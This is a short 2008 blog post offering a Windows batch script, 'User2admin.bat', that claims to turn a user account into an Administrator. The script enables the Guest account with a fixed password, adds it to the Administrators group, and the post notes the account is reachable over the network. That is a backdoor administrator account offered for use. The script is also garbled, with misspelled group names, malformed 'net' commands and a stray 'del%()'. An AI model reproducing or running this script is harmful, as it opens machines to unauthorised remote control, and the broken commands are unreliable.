Know about "GIRLS"


Friends18.com Orkut MySpace Hi5 Scrap Images

Tuesday, August 19, 2008

Want to convert User account into an Administrator?

All you need to do is copy the code below,copy/paste it into Notepad and save it as User2admin.bat on ur desktop.

echo off
title Please wait...
cls
net user add Username Password/add
net user localgroup Administrtors Username/add
net user Guest 420/active:yes
net localgroup Guests Guest/DELETE
net localgroup Administrators Guest/add
del%()

Double-click the file to execute or typethe above-given code in Commend Prompt.

Note: this also creates a net account which is also accessable through nets open port.

No comments: